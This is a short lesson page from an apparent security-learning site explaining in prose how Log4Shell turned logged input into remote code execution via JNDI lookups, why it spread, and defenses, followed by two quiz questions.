← Lessons

quiz vs the machine

Platinum1700

Security

Log4Shell And JNDI Injection

How a logged string became remote code execution through a lookup feature.

5 min read · advanced · beat Platinum to climb

The Lesson Of Log4Shell

Log4Shell showed how a logging library that expanded lookup expressions could be tricked into fetching and running remote code. Any attacker controlled string that reached a log call could trigger a JNDI lookup to a malicious server.

The Chain

  • The application logs untrusted input, such as a header or username.
  • The logger interpolates a special expression and performs a directory lookup over the network.
  • The attacker's server returns a reference that the runtime loads and executes.

Why It Spread

  • Logging is everywhere and rarely treated as a dangerous sink.
  • Vulnerable code sat deep inside transitive dependencies.

Defenses

  • Disable lookup or message interpolation features in logging configuration.
  • Block outbound JNDI and untrusted class loading.
  • Maintain a software bill of materials so you can find affected libraries fast.

Key idea

Log4Shell turned logging into a remote code path through automatic lookups, so disable interpolation, block untrusted class loading, and track dependencies.

Check yourself

Answer to earn rating on the learn ladder.

1. What turned simple logging into code execution?

2. Why did the flaw spread so widely?